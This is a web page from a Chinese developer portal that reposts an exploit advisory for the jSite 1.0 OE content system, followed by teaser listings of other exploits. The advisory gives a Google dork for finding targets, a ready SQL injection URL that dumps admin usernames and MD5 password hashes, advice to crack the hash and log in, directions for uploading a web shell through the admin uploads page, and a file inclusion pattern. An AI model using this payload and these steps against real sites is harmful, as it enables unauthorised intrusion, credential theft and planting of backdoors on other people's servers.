首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

所属分类: 网络安全 / Exploit 阅读数: 128
收藏 0 赞 0 分享
--== ================================================================================ ==--
--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--
--== ================================================================================ ==--

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-

AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

Download: http://www.sclek.com/jsite.zip

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by jSite 1.0 OE"

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:
www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws

(0x3a,user,pass),admin/**/from/**/jsite_users/*

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:

1 Week Off & I Be Back :D ;)

Admin Login Is At /admin/

U Can Upload Your Shell When U Login Successfully
From This Link: www.site.com/admin/index.php?menu=uploads
& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php

-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Exploit:

www.[target].com/Script/index.php?module=[LFI]


--== ================================================================================ ==--
--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--
--== ================================================================================ ==--
更多精彩内容其他人还在看

Maian Events 2.0 Insecure Cookie Handling Vulnerability

Author: Saime Date: July 12, 2008 Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworld
收藏 0 赞 0 分享

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Author: Saime Date: July 12, 2008 Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworl
收藏 0 赞 0 分享

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

################################################################# # # Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
收藏 0 赞 0 分享

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Author: Saime Date: July 12, 2008 Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworld.c
收藏 0 赞 0 分享

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

#!/usr/bin/perl # # http://www.securityfocus.com/bid/11775 # credit to Muts for this vulnerability # acaro [at] jervus.it
收藏 0 赞 0 分享

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

#!/usr/bin/perl #---------------------------------------------------------------- # #Script : PhsBlog v0.2 # #Type : Bypass S
收藏 0 赞 0 分享

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

#!/usr/bin/perl #---------------------------------------------------------------- # #Script : Ezphotogallery 2.1 # #Type : Mu
收藏 0 赞 0 分享

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

<!-- Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC Summary: Maxthon Browser is a powerful tabbed browser built
收藏 0 赞 0 分享

minb 0.1.0 Remote Code Execution Exploit

#!/usr/bin/python ##################################################################################### #### minb
收藏 0 赞 0 分享

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com) Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista I
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 www.zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22